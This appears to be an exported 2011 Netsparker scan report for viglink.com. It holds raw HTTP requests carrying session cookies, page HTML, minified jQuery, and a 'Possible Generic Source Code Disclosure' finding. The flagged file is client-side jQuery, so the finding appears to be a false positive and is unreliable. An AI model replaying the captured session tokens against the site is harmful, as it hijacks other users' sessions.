x(){b.support.noCloneEvent=false;d.detachEvent("onclick",x)});d.cloneNode(true).fireEvent("onclick")}d=A.createElement("div");d.innerHTML="<input type='radio' name='radiotest' checked='checked'/>";a=A.createDocumentFragment();a.appendChild(d.firstChild);b.support.checkClone=a.cloneNode(true).cloneNode(true).lastChild.checked;b(function(){var x=A.createElement("div");x.style.width=x.style.paddingLeft="1px";A.body.appendChild(x);b.boxModel=b.support.boxModel=x.offsetWidth===2;A.body.removeChild(x).style.display="none"});a=function(x){var E=A.createElement("div");x="on"+x;var L=x in E;if(!L){E.setAttribute(x,"return;");L=typeof E[x]==="function"}return L};b.support.submitBubbles=a("submit");b.support.changeBubbles=a("change");a=c=d=e=m=null}})();b.props={"for":"htmlFor","class":"className",readonly:"readOnly",maxlength:"maxLength",cellspacing:"cellSpacing",rowspan:"rowSpan",colspan:"colSpan",tabindex:"tabIndex",usemap:"useMap",frameborder:"frameBorder"};var ja="jQuery"+l(),wa=0,pa={};b.extend({cache:{},expando:ja,noData:{embed:true,object:true,applet:true},data:function(a,c,d){if(!(a.nodeName&&b.noData[a.nodeName.toLowerCase()])){a=a==f?pa:a;var g=a[ja],e=b.cache;if(!g&&typeof c==="string"&&d===o)return null;g||(g=++wa);if(typeof c==="object"){a[ja]=g;e[g]=b.extend(true,{},c)}else if(!e[g]){a[ja]=g;e[g]={}}a=e[g];if(d!==o)a[c]=d;return typeof c==="string"?a[c]:a}},removeData:function(a,c){if(!(a.nodeName&&b.noData[a.nodeName.toLowerCase()])){a=a==f?pa:a;var d=a[ja],g=b.cache,e=g[d];if(c){if(e){delete e[c];b.isEmptyObject(e)&&b.removeData(a)}}else{if(b.support.deleteExpando)delete a[b.expando];else a.removeAttribute&&a.removeAttribute(b.expando);delete g[d]}}}});b.fn.extend({data:function(a,c){if(typeof a==="undefined"&&this.length)return b.data(this[0]);else if(typeof a==="object")return this.each(function(){b.data(this,a)});var d=a.split(".");d[1]=d[1]?"."+d[1]:"";if(c===o){var g=this.triggerHandler("getData"+d[1]+"!",[d[0]]);if(g===o&&this.length)g=b.data(this[0],a);return g===o&&d[1]?this.data(d[0]):g}else return this.trigger("setData"+d[1]+"!",[d[0],c]).each(function(){b.data(this,a,c)})},removeData:function(a){return this.each(function(){b.removeData(this,a)})}});b.extend({queue:function(a,c,d){if(a){c=(c||"fx")+"queue";var g=b.data(a,c);if(!d)return g||[];if(!g||b.isArray(d))g=b.data(a,c,b.makeArray(d));else g.push(d);return g}},dequeue:function(a,c){c=c||"fx";var d=b.queue(a,c),g=d.shift();if(g==="inprogress")g=d.shift();if(g){c==="fx"&&d.unshift("inprogress");g.call(a,function(){b.dequeue(a,c)})}}});b.fn.extend({queue:function(a,c){if(typeof a!=="string"){c=a;a="fx"}if(c===o)return b.queue(this[0],a);return this.each(function(){var d=b.queue(this,a,c);a==="fx"&&d[0]!=="inprogress"&&b.dequeue(this,a)})},dequeue:function(a){return this.each(function(){b.dequeue(this,a)})},delay:function(a,c){a=b.fx?b.fx.speeds[a]||a:a;c=c||"fx";return this.queue(c,function(){var d=this;setTimeout(function(){b.dequeue(d,c)},a)})},clearQueue:function(a){return this.queue(a||"fx",[])}});var aa=/[\n\t]/g,da=/\s+/,ha=/\r/g,sa=/href|src|style/,za=/(button|input)/i,ya=/(button|input|object|select|textarea)/i,Fa=/^(a|area)$/i,v=/radio|checkbox/;b.fn.extend({attr:function(a,c){return h(this,a,c,true,b.attr)},removeAttr:function(a){return this.each(function(){b.attr(this,a,"");this.nodeType===1&&this.removeAttribute(a)})},addClass:function(a){if(b.isFunction(a))return this.each(function(E){var L=b(this);L.addClass(a.call(this,E,L.attr("class")))});if(a&&typeof a==="string")for(var c=(a||"").split(da),d=0,g=this.length;d<g;d++){var e=this[d];if(e.nodeType===1)if(e.className){for(var m=" "+e.className+" ",n=e.className,C=0,x=c.length;C<x;C++)if(m.indexOf(" "+c[C]+" ")<0)n+=" "+c[C];e.className=b.trim(n)}else e.className=a}return this},removeClass:function(a){if(b.isFunction(a))return this.each(function(x){var E=b(this);E.removeClass(a.call(this,x,E.attr("class")))});if(a&&typeof a==="string"||a===o)for(var c=(a||"").split(da),d=0,g=this.length;d<g;d++){var e=this[d];if(e.nodeType===1&&e.className)if(a){for(var m=(" "+e.className+" ").replace(aa," "),n=0,C=c.length;n<C;n++)m=m.replace(" "+c[n]+" "," ");e.className=b.trim(m)}else e.className=""}return this},toggleClass:function(a,c){var d=typeof a,g=typeof c==="boolean";if(b.isFunction(a))return this.each(function(e){var m=b(this);m.toggleClass(a.call(this,e,m.attr("class"),c),c)});return this.each(function(){if(d==="string")for(var e,m=0,n=b(this),C=c,x=a.split(da);e=x[m++];){C=g?C:!n.hasClass(e);n[C?"addClass":"removeClass"](e)}else if(d==="undefined"||d==="boolean"){this.className&&b.data(this,"__className__",this.className);this.className=this.className||a===false?"":b.data(this,"__className__")||""}})},hasClass:function(a){a=" "+a+" ";for(var c=0,d=this.length;c<d;c++)if((" "+this[c].className+" ").replace(aa," ").indexOf(a)>-1)return true;return false},val:function(a){if(a===o){var c=this[0];if(c){if(b.nodeName(c,"option"))return(c.attributes.value||{}).specified?c.value:c.text;if(b.nodeName(c,"select")){var d=c.selectedIndex,g=[],e=c.options;c=c.type==="select-one";if(d<0)return null;var m=c?d:0;for(d=c?d+1:e.length;m<d;m++){var n=e[m];if(n.selected){a=b(n).val();if(c)return a;g.push(a)}}return g}if(v.test(c.type)&&!b.support.checkOn)return c.getAttribute("value")===null?"on":c.value;return(c.value||"").replace(ha,"")}}else{var C=b.isFunction(a);return this.each(function(x){var E=b(this),L=a;if(this.nodeType===1){if(C)L=a.call(this,x,E.val());if(typeof L==="number")L+="";if(b.isArray(L)&&v.test(this.type))this.checked=b.inArray(E.val(),L)>=0;else if(b.nodeName(this,"select")){var Y=b.makeArray(L);b("option",this).each(function(){this.selected=b.inArray(b(this).val(),Y)>=0});if(!Y.length)this.selectedIndex=-1}else this.value=L}})}}});b.extend({attrFn:{val:true,css:true,html:true,text:true,data:true,width:true,height:true,offset:true},attr:function(a,c,d,g){if(!(!a||a.nodeType===3||a.nodeType===8)){if(g&&c in b.attrFn)return b(a)[c](d);g=a.nodeType!==1||!b.isXMLDoc(a);var e=d!==o;c=g&&b.props[c]||c;if(a.nodeType===1){var m=sa.test(c);if(c in a&&g&&!m){if(e){c==="type"&&za.test(a.nodeName)&&a.parentNode&&b.error("type property can't be changed");a[c]=d}if(b.nodeName(a,"form")&&a.getAttributeNode(c))return a.getAttributeNode(c).nodeValue;if(c==="tabIndex")return(c=a.getAttributeNode("tabIndex"))&&c.specified?c.value:ya.test(a.nodeName)||Fa.test(a.nodeName)&&a.href?0:o;return a[c]}if(!b.support.style&&g&&c==="style"){if(e)a.style.cssText=""+d;return a.style.cssText}e&&a.setAttribute(c,""+d);a=!b.support.hrefNormalized&&g&&m?a.getAttribute(c,2):a.getAttribute(c);return a===null?o:a}return b.style(a,c,d)}}});var H=/\.(.*)$/,X=function(a){return a.replace(/[^\w\s\.\|`]/g,function(c){return"\\"+c})};b.event={add:function(a,c,d,g){if(!(a.nodeType===3||a.nodeType===8)){if(a.setInterval&&a!==f&&..
- /policies/ftc

/policies/ftc

https://www.viglink.com/policies/ftc

Request

GET /policies/ftc HTTP/1.1
Referer: https://www.viglink.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.viglink.com
Cookie: JSESSIONID=57A19F24EB19902D7F1AF41D775C30AB; vglnk.Agent.p=bfddb90717c6db6b0a7878196952ce96
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 18 Apr 2011 23:50:51 GMT
Expires: -1
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3096
Connection: close


<!doctype html><html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"><head> <title>VigLink - FTC Disclosure</title> <meta http-equiv="Content-type" content="text/html; charset=utf-8"/> <meta name="keywords" content="affiliate marketing, monetization, content, optimization"/> <meta name="description" content="Your links can be doing more. Unlock the power of your site&#39;s links and earn extra money from your site automatically, transparently and honestly."/> <meta property="og:title" content="VigLink"/> <meta property="og:type" content="company"/> <meta property="og:url" content="http://www.viglink.com/"/> <meta property="og:image" content="http://www.viglink.com/public/images/logo-icon-small.png"/> <meta property="og:latitude" content="37.7801339"/> <meta property="og:longitude" content="-122.396744"/> <meta property="og:street-address" content="539 Bryant St Suite 400"/> <meta property="og:locality" content="San Francisco"/> <meta property="og:region" content="CA"/> <meta property="og:postal-code" content="94107"/> <meta property="og:country-name" content="USA"/> <meta property="og:email" content="info@viglink.com"/> <meta property="og:phone_number" content="+1 (415) 963-9826"/> <meta property="og:fax_number" content="+1 (415) 520-6695"/> <meta property="og:site_name" content="VigLink"/> <meta property="fb:admins" content="6003321,705684"/> <link rel="icon" type="image/png" href="/public/images/favicon.png"/> <link rel="alternate" type="application/rss+xml" title="VigLink Blog &raquo; Feed" href="http://blog.viglink.com/feed/" /> <script type="text/javascript"> var ENV = { account: { }, cookie: { domain: '.viglink.com', suffix: 'p' ? '.p' : '' } }; </script> <link rel="stylesheet" type="text/css" href="/combined.css.h-1806938078.pack" charset="utf-8"/><link rel="stylesheet" type="text/css" href="/combined.css.h-785608775.pack" charset="utf-8"/><script type="text/javascript" src="/combined.js.h898114336.pack" charset="utf-8"></script><script type="text/javascript" src="/combined.js.h878398113.pack" charset="utf-8"></script><!--[if IE 7]><link rel="stylesheet" href="/public/css/ie7.css" type="text/css" /><![endif]--></head><body> <div id="header"> <div class="content"> <h1><a href="/">VigLink</a></h1> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul><span class="delimiter"></span> <ul class="navigation"> <li><a href="/users/signup">Sign Up</a></li><li><a href="/users/login">Log In</a></li></ul> </div></div><div id="body"> <h2><abbr title="Federal Trade Commission">FTC</abbr> Disclosure</h2><div> <div class="column span-7"> <h3>Readers</h3> <p> The site that brought you here uses VigLink to automatically affiliate their commercial links. They've linked to this page because they want you to know that they sometimes get paid if you click one of those links and purchase a product or service. Regardless of this potential revenue, unless stated otherwise, the site only recommends products or services they use personally. </p> <a href="/corp/publishers">Learn More about VigLink</a>. </div> <div class="column span-5"> <div class="aside"> <h3>More Information</h3> <p class="intro"> This disclosure is provided in accordance with the Federal Trade Commission's 16 <abbr title="Code of Federal Regulations">CFR</abbr> &#167; 255.5: <a href="http://www.ftc.gov/os/2009/10/091005endorsementguidesfnnotice.pdf">Guides Concerning the Use of Endorsements and Testimonials in Advertising</a>. </p> <h5>Opt Out</h5> <p> You can <a href="/optout">opt out of VigLink</a> for sites that you visit. </p> </div> </div></div><div> <h3>Publishers</h3> <h4>Disclosure</h4> <div class="column span-50p"> <p> The Federal Trade Commission requires that you disclose to your readers when you endorse a product or service and have a "material connection" to the seller. If you're using affiliated links, with or without VigLink, you have that connection. </p> <p> These <abbr title="Federal Trade Commission">FTC</abbr> guidelines are <a href="http://www.ftc.gov/os/2009/10/091005endorsementguidesfnnotice.pdf">available online</a>. (Specifically, look at &#167; 255.5, beginning on page 75.) </p> <h4>Referral Program</h4> <p> Links to viglink.com from your VigLink-enabled pages are automatically included in our referral program. If one of your visitors follows one of those links and signs up for VigLink, <strong>you get a 10% commission</strong>! </p> <h4>Badges</h4> <p> Linking to this page with one of our badges is a great way participate in our referral program while simultaneously disclosing to your readers that you use VigLink to monetize links. </p> </div> <div class="column span-50p"> <h5>Badges</h5> <ul id="badges"> <li> <a href="http://www.viglink.com/policies/ftc" class="120x55"> <img src="/public/images/badges/120x55.png" width="120" height="55" title="Links monetized by VigLink"/> <span class="dimensions">120&#215;55</span> </a> </li> <li> <a href="http://www.viglink.com/policies/ftc" class="120x40"> <img src="/public/images/badges/120x40.png" width="120" height="40"/> <span class="dimensions">120&#215;40</span> </a> </li> <li> <a href="http://www.viglink.com/policies/ftc" class="80x40"> <img src="/public/images/badges/80x40.png" width="80" height="40"/> <span class="dimensions">80&#215;40</span> </a> </li> <li> <a href="http://www.viglink.com/policies/ftc" class="150x25"> <img src="/public/images/badges/150x25.png" width="150" height="25"/> <span class="dimensions">150&#215;25</span> </a> </li> <li> <a href="http://www.viglink.com/policies/ftc?vgtag=badge" class="text">Links monetized by <span style="background: transparent url(http://www.viglink.com/public/images/favicon.png) no-repeat 0% 50%; padding-left: 18px;"> VigLink</span></a> </li> </ul> <h5>Badge HTML</h5> <textarea spellcheck="false" readonly="readonly" class="code"></textarea> <script type="text/html" id="badge_html"> <a href="http://www.viglink.com/policies/ftc?vgtag=badge"><img src="http://www.viglink.com/public/images/badges/<?= width + 'x' + height ?>.png" width="<?= width ?>" height="<?= height ?>" title="Links monetized by VigLink"/></a> </script> </div></div></div> <div id="footer"> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul><ul class="social navigation"> <li class="twitter"><a href="http://www.twitter.com/viglink"><strong>Follow us</strong> on Twitter</a></li> <li class="facebook"><a href="http://www.facebook.com/viglink"><strong>Become a fan</strong> on Facebook</a></li> </ul> <ul class="minor navigation"> <li><a href="/about">About</a></li> <li><a href="/jobs">Jobs</a></li> <li><a href="/about/press">Press</a></li> <li><a href="/policies/tos">Terms of Service</a></li> <li><a href="/policies/privacy">Privacy Policy</a></li> <li><a href="/policies/ftc">FTC Disclosure</a></li> <li><a href="/support">Contact Us</a></li> </ul> <span> &copy; VigLink 2011</span></div><script type="text/javascript"> var is_ssl = ("https:" == document.location.protocol); var asset_host = is_ssl ? "https://s3.amazonaws.com/getsatisfaction.com/" : "http://s3.amazonaws.com/getsatisfaction.com/"; document.write(unescape("%3Cscript src='" + asset_host + "javascripts/feedback-v2.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> (function() { try { new GSFN.feedback_widget({ display: "overlay", company: "viglink", placement: "right", color: ";", style: "question" }); } catch(err) {} })(); </script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-8560005-1"); pageTracker._trackPageview(); } catch(err) {} </script> <!-- Served by: www.viglink.com (10.242.201.220) --></body></html>
[Possible] Generic Source Code Disclosure

[Possible] Generic Source Code Disclosure

1 TOTAL
MEDIUM
Netsparker identified a web page that discloses server side source code. An attacker can obtain server side source code of web application, which can contain sensitive data such as database connection strings, usernames and passwords along with the technical and business logic of the application.

Impact

Depending on the nature of the source code disclosed an attacker can mount one or more of the following types of attacks:
  • Access the database or other data resources. With the privileges of the account obtained attempt to read, update or delete arbitrary data from the database.
  • Access password protected administrative mechanisms such as "dashboard", "management console" and "admin panel" potentially leading to gull control of the application.
  • Develop further attacks by investigating the source code for input validation errors and logic vulnerabilities.

Actions to Take

  1. Confirm exactly what aspects of the source code is actually disclosed; due limitations of these types of vulnerability it might not be possible to confirm this in all instances. Confirm this is not intended functionality.
  2. If it is a file required by the application, change its permissions to prevent public users from accessing it. If it is not, then remove it from the web server
  3. Ensure that the server has all the current security patches applied.
  4. Remove all temporary and backup files from the web server.

Required Skills for Successful Exploitation

This is dependent on the information obtained from source code. Uncovering these forms of vulnerabilities does not require high levels of skills. However a highly skilled attacker could leverage this form of vulnerability to obtain account information for databases or administrative panels, ultimately leading to control of the application or even the host the application reside on.

External References

- /combined.js.h898114336.pack

/combined.js.h898114336.pack

http://www.viglink.com/combined.js.h898114336.pack

Request

GET /combined.js.h898114336.pack HTTP/1.1
Referer: http://www.viglink.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.viglink.com
Cookie: JSESSIONID=CEF7843FA8178E6F5D0D7AB172BA439B; vglnk.Agent.p=bfddb90717c6db6b0a7878196952ce96
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Encoding:
Content-Type: text/javascript;charset=utf-8
Date: Mon, 18 Apr 2011 23:50:51 GMT
ETag: pack898114336
Expires: Thu, 15 Apr 2021 23:50:51 GMT
X-Powered-By: pack:tag
transfer-encoding: chunked
Connection: keep-alive


(function(f,o){function t(){if(!b.isReady){try{A.documentElement.doScroll("left")}catch(a){setTimeout(t,1);return}b.ready()}}function k(a,c){c.src?b.ajax({url:c.src,async:false,dataType:"script"}):b.globalEval(c.text||c.textContent||c.innerHTML||"");c.parentNode&&c.parentNode.removeChild(c)}function h(a,c,d,g,e,m){var n=a.length;if(typeof c==="object"){for(var C in c)h(a,C,c[C],g,e,d);return a}if(d!==o){g=!m&&g&&b.isFunction(d);for(C=0;C<n;C++)e(a[C],c,g?d.call(a[C],C,e(a[C],c)):d,m);return a}return n?e(a[0],c):o}function l(){return(new Date).getTime()}function u(){return false}function J(){return true}function B(a,c,d){d[0].type=a;return b.event.handle.apply(c,d)}function r(a){var c,d=[],g=[],e=arguments,m,n,C,x,E,L;n=b.data(this,"events");if(!(a.liveFired===this||!n||!n.live||a.button&&a.type==="click")){a.liveFired=this;var Y=n.live.slice(0);for(x=0;x<Y.length;x++){n=Y[x];n.origType.replace(H,"")===a.type?g.push(n.selector):Y.splice(x--,1)}m=b(a.target).closest(g,a.currentTarget);E=0;for(L=m.length;E<L;E++)for(x=0;x<Y.length;x++){n=Y[x];if(m[E].selector===n.selector){C=m[E].elem;g=null;if(n.preType==="mouseenter"||n.preType==="mouseleave")g=b(a.relatedTarget).closest(n.selector)[0];if(!g||g!==C)d.push({elem:C,handleObj:n})}}E=0;for(L=d.length;E<L;E++){m=d[E];a.currentTarget=m.elem;a.data=m.handleObj.data;a.handleObj=m.handleObj;if(m.handleObj.origHandler.apply(m.elem,e)===false){c=false;break}}return c}}function P(a,c){return"live."+(a&&a!=="*"?a+".":"")+c.replace(/\./g,"`").replace(/ /g,"&")}function M(a,c){var d=0;c.each(function(){if(this.nodeName===(a[d]&&a[d].nodeName)){var g=b.data(a[d++]),e=b.data(this,g);if(g=g&&g.events){delete e.handle;e.events={};for(var m in g)for(var n in g[m])b.event.add(this,m,g[m][n],g[m][n].data)}}})}function i(a,c,d){var g,e,m;c=c&&c[0]?c[0].ownerDocument||c[0]:A;if(a.length===1&&typeof a[0]==="string"&&a[0].length<512&&c===A&&!Ra.test(a[0])&&(b.support.checkClone||!Sa.test(a[0]))){e=true;if(m=b.fragments[a[0]])if(m!==1)g=m}if(!g){g=c.createDocumentFragment();b.clean(a,c,g,d)}if(e)b.fragments[a[0]]=m?g:1;return{fragment:g,cacheable:e}}function q(a,c){var d={};b.each(Ta.concat.apply([],Ta.slice(0,c)),function(){d[this]=a});return d}function s(a){return"scrollTo"in a&&a.document?a:a.nodeType===9?a.defaultView||a.parentWindow:false}var b=function(a,c){return new b.fn.init(a,c)},D=f.jQuery,I=f.$,A=f.document,K,V=/^[^<]*(<[\w\W]+>)[^>]*$|^#([\w-]+)$/,R=/^.[^:#\[\.,]*$/,ga=/\S/,oa=/^(\s|\u00A0)+|(\s|\u00A0)+$/g,ra=/^<(\w+)\s*\/?>(?:<\/\1>)?$/,ka=navigator.userAgent,O=false,N=[],Q,w=Object.prototype.toString,T=Object.prototype.hasOwnProperty,la=Array.prototype.push,ba=Array.prototype.slice,ea=Array.prototype.indexOf;b.fn=b.prototype={init:function(a,c){var d,g,e;if(!a)return this;if(a.nodeType){this.context=this[0]=a;this.length=1;return this}if(a==="body"&&!c){this.context=A;this[0]=A.body;this.selector="body";this.length=1;return this}if(typeof a==="string")if((d=V.exec(a))&&(d[1]||!c))if(d[1]){e=c?c.ownerDocument||c:A;if(g=ra.exec(a))if(b.isPlainObject(c)){a=[A.createElement(g[1])];b.fn.attr.call(a,c,true)}else a=[e.createElement(g[1])];else{g=i([d[1]],[e]);a=(g.cacheable?g.fragment.cloneNode(true):g.fragment).childNodes}return b.merge(this,a)}else{if(g=A.getElementById(d[2])){if(g.id!==d[2])return K.find(a);this.length=1;this[0]=g}this.context=A;this.selector=a;return this}else if(!c&&/^\w+$/.test(a)){this.selector=a;this.context=A;a=A.getElementsByTagName(a);return b.merge(this,a)}else return!c||c.jquery?(c||K).find(a):b(c).find(a);else if(b.isFunction(a))return K.ready(a);if(a.selector!==o){this.selector=a.selector;this.context=a.context}return b.makeArray(a,this)},selector:"",jquery:"1.4.2",length:0,size:function(){return this.length},toArray:function(){return ba.call(this,0)},get:function(a){return a==null?this.toArray():a<0?this.slice(a)[0]:this[a]},pushStack:function(a,c,d){var g=b();b.isArray(a)?la.apply(g,a):b.merge(g,a);g.prevObject=this;g.context=this.context;if(c==="find")g.selector=this.selector+(this.selector?" ":"")+d;else if(c)g.selector=this.selector+"."+c+"("+d+")";return g},each:function(a,c){return b.each(this,a,c)},ready:function(a){b.bindReady();if(b.isReady)a.call(A,b);else N&&N.push(a);return this},eq:function(a){return a===-1?this.slice(a):this.slice(a,+a+1)},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},slice:function(){return this.pushStack(ba.apply(this,arguments),"slice",ba.call(arguments).join(","))},map:function(a){return this.pushStack(b.map(this,function(c,d){return a.call(c,d,c)}))},end:function(){return this.prevObject||b(null)},push:la,sort:[].sort,splice:[].splice};b.fn.init.prototype=b.fn;b.extend=b.fn.extend=function(){var a=arguments[0]||{},c=1,d=arguments.length,g=false,e,m,n,C;if(typeof a==="boolean"){g=a;a=arguments[1]||{};c=2}if(typeof a!=="object"&&!b.isFunction(a))a={};if(d===c){a=this;--c}for(;c<d;c++)if((e=arguments[c])!=null)for(m in e){n=a[m];C=e[m];if(a!==C)if(g&&C&&(b.isPlainObject(C)||b.isArray(C))){n=n&&(b.isPlainObject(n)||b.isArray(n))?n:b.isArray(C)?[]:{};a[m]=b.extend(g,n,C)}else if(C!==o)a[m]=C}return a};b.extend({noConflict:function(a){f.$=I;if(a)f.jQuery=D;return b},isReady:false,ready:function(){if(!b.isReady){if(!A.body)return setTimeout(b.ready,13);b.isReady=true;if(N){for(var a,c=0;a=N[c++];)a.call(A,b);N=null}b.fn.triggerHandler&&b(A).triggerHandler("ready")}},bindReady:function(){if(!O){O=true;if(A.readyState==="complete")return b.ready();if(A.addEventListener){A.addEventListener("DOMContentLoaded",Q,false);f.addEventListener("load",b.ready,false)}else if(A.attachEvent){A.attachEvent("onreadystatechange",Q);f.attachEvent("onload",b.ready);var a=false;try{a=f.frameElement==null}catch(c){}A.documentElement.doScroll&&a&&t()}}},isFunction:function(a){return w.call(a)==="[object Function]"},isArray:function(a){return w.call(a)==="[object Array]"},isPlainObject:function(a){if(!a||w.call(a)!=="[object Object]"||a.nodeType||a.setInterval)return false;if(a.constructor&&!T.call(a,"constructor")&&!T.call(a.constructor.prototype,"isPrototypeOf"))return false;for(var c in a);return c===o||T.call(a,c)},isEmptyObject:function(a){for(var c in a)return false;return true},error:function(a){throw a;},parseJSON:function(a){if(typeof a!=="string"||!a)return null;a=b.trim(a);if(/^[\],:{}\s]*$/.test(a.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g,"@").replace(/"[^"\\\n\r]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g,"]").replace(/(?:^|:|,)(?:\s*\[)+/g,"")))return f.JSON&&f.JSON.parse?f.JSON.parse(a):(new Function("return "+a))();else b.error("Invalid JSON: "+a)},noop:function(){},globalEval:function(a){if(a&&ga.test(a)){var c=A.getElementsByTagName("head")[0]||A.documentElement,d=A.createElement("script");d.type="text/javascript";if(b.support.scriptEval)d.appendChild(A.createTextNode(a));else d.text=a;c.insertBefore(d,c.firstChild);c.removeChild(d)}},nodeName:function(a,c){return a.nodeName&&a.nodeName.toUpperCase()===c.toUpperCase()},each:function(a,c,d){var g,e=0,m=a.length,n=m===o||b.isFunction(a);if(d)if(n)for(g in a){if(c.apply(a[g],d)===false)break}else for(;e<m;){if(c.apply(a[e++],d)===false)break}else if(n)for(g in a){if(c.call(a[g],g,a[g])===false)break}else for(d=a[0];e<m&&c.call(d,e,d)!==false;d=a[++e]);return a},trim:function(a){return(a||"").replace(oa,"")},makeArray:function(a,c){var d=c||[];if(a!=null)a.length==null||typeof a==="string"||b.isFunction(a)||typeof a!=="function"&&a.setInterval?la.call(d,a):b.merge(d,a);return d},inArray:function(a,c){if(c.indexOf)return c.indexOf(a);for(var d=0,g=c.length;d<g;d++)if(c[d]===a)return d;return-1},merge:function(a,c){var d=a.length,g=0;if(typeof c.length==="number")for(var e=c.length;g<e;g++)a[d++]=c[g];else for(;c[g]!==o;)a[d++]=c[g++];a.length=d;return a},grep:function(a,c,d){for(var g=[],e=0,m=a.length;e<m;e++)!d!==!c(a[e],e)&&g.push(a[e]);return g},map:function(a,c,d){for(var g=[],e,m=0,n=a.length;m<n;m++){e=c(a[m],m,d);if(e!=null)g[g.length]=e}return g.concat.apply([],g)},guid:1,proxy:function(a,c,d){if(arguments.length===2)if(typeof c==="string"){d=a;a=d[c];c=o}else if(c&&!b.isFunction(c)){d=c;c=o}if(!c&&a)c=function(){return a.apply(d||this,arguments)};if(a)c.guid=a.guid=a.guid||c.guid||b.guid++;return c},uaMatch:function(a){a=a.toLowerCase();a=/(webkit)[ \/]([\w.]+)/.exec(a)||/(opera)(?:.*version)?[ \/]([\w.]+)/.exec(a)||/(msie) ([\w.]+)/.exec(a)||!/compatible/.test(a)&&/(mozilla)(?:.*? rv:([\w.]+))?/.exec(a)||[];return{browser:a[1]||"",version:a[2]||"0"}},browser:{}});ka=b.uaMatch(ka);if(ka.browser){b.browser[ka.browser]=true;b.browser.version=ka.version}if(b.browser.webkit)b.browser.safari=true;if(ea)b.inArray=function(a,c){return ea.call(c,a)};K=b(A);if(A.addEventListener)Q=function(){A.removeEventListener("DOMContentLoaded",Q,false);b.ready()};else if(A.attachEvent)Q=function(){if(A.readyState==="complete"){A.detachEvent("onreadystatechange",Q);b.ready()}};(function(){b.support={};var a=A.documentElement,c=A.createElement("script"),d=A.createElement("div"),g="script"+l();d.style.display="none";d.innerHTML=" <link/><table></table><a href='/a' style='color:red;float:left;opacity:.55;'>a</a><input type='checkbox'/>";var e=d.getElementsByTagName("*"),m=d.getElementsByTagName("a")[0];if(!(!e||!e.length||!m)){b.support={leadingWhitespace:d.firstChild.nodeType===3,tbody:!d.getElementsByTagName("tbody").length,htmlSerialize:!!d.getElementsByTagName("link").length,style:/red/.test(m.getAttribute("style")),hrefNormalized:m.getAttribute("href")==="/a",opacity:/^0.55$/.test(m.style.opacity),cssFloat:!!m.style.cssFloat,checkOn:d.getElementsByTagName("input")[0].value==="on",optSelected:A.createElement("select").appendChild(A.createElement("option")).selected,parentNode:d.removeChild(d.appendChild(A.createElement("div"))).parentNode===null,deleteExpando:true,checkClone:false,scriptEval:false,noCloneEvent:true,boxModel:null};c.type="text/javascript";try{c.appendChild(A.createTextNode("window."+g+"=1;"))}catch(n){}a.insertBefore(c,a.firstChild);if(f[g]){b.support.scriptEval=true;delete f[g]}try{delete c.test}catch(C){b.support.deleteExpando=false}a.removeChild(c);if(d.attachEvent&&d.fireEvent){d.attachEvent("onclick",function x(){b.support.noCloneEvent=false;d.detachEvent("onclick",x)});d.cloneNode(true).fireEvent("onclick")}d=A.createElement("div");d.innerHTML="<input type='radio' name='radiotest' checked='checked'/>";a=A.createDocumentFragment();a.appendChild(d.firstChild);b.support.checkClone=a.cloneNode(true).cloneNode(true).lastChild.checked;b(function(){var x=A.createElement("div");x.style.width=x.style.paddingLeft="1px";A.body.appendChild(x);b.boxModel=b.support.boxModel=x.offsetWidth===2;A.body.removeChild(x).style.display="none"});a=function(x){var E=A.createElement("div");x="on"+x;var L=x in E;if(!L){E.setAttribute(x,"return;");L=typeof E[x]==="function"}return L};b.support.submitBubbles=a("submit");b.support.changeBubbles=a("change");a=c=d=e=m=null}})();b.props={"for":"htmlFor","class":"className",readonly:"readOnly",maxlength:"maxLength",cellspacing:"cellSpacing",rowspan:"rowSpan",colspan:"colSpan",tabindex:"tabIndex",usemap:"useMap",frameborder:"frameBorder"};var ja="jQuery"+l(),wa=0,pa={};b.extend({cache:{},expando:ja,noData:{embed:true,object:true,applet:true},data:function(a,c,d){if(!(a.nodeName&&b.noData[a.nodeName.toLowerCase()])){a=a==f?pa:a;var g=a[ja],e=b.cache;if(!g&&typeof c==="string"&&d===o)return null;g||(g=++wa);if(typeof c==="object"){a[ja]=g;e[g]=b.extend(true,{},c)}else if(!e[g]){a[ja]=g;e[g]={}}a=e[g];if(d!==o)a[c]=d;return typeof c==="string"?a[c]:a}},removeData:function(a,c){if(!(a.nodeName&&b.noData[a.nodeName.toLowerCase()])){a=a==f?pa:a;var d=a[ja],g=b.cache,e=g[d];if(c){if(e){delete e[c];b.isEmptyObject(e)&&b.removeData(a)}}else{if(b.support.deleteExpando)delete a[b.expando];else a.removeAttribute&&a.removeAttribute(b.expando);delete g[d]}}}});b.fn.extend({data:function(a,c){if(typeof a==="undefined"&&this.length)return b.data(this[0]);else if(typeof a==="object")return this.each(function(){b.data(this,a)});var d=a.split(".");d[1]=d[1]?"."+d[1]:"";if(c===o){var 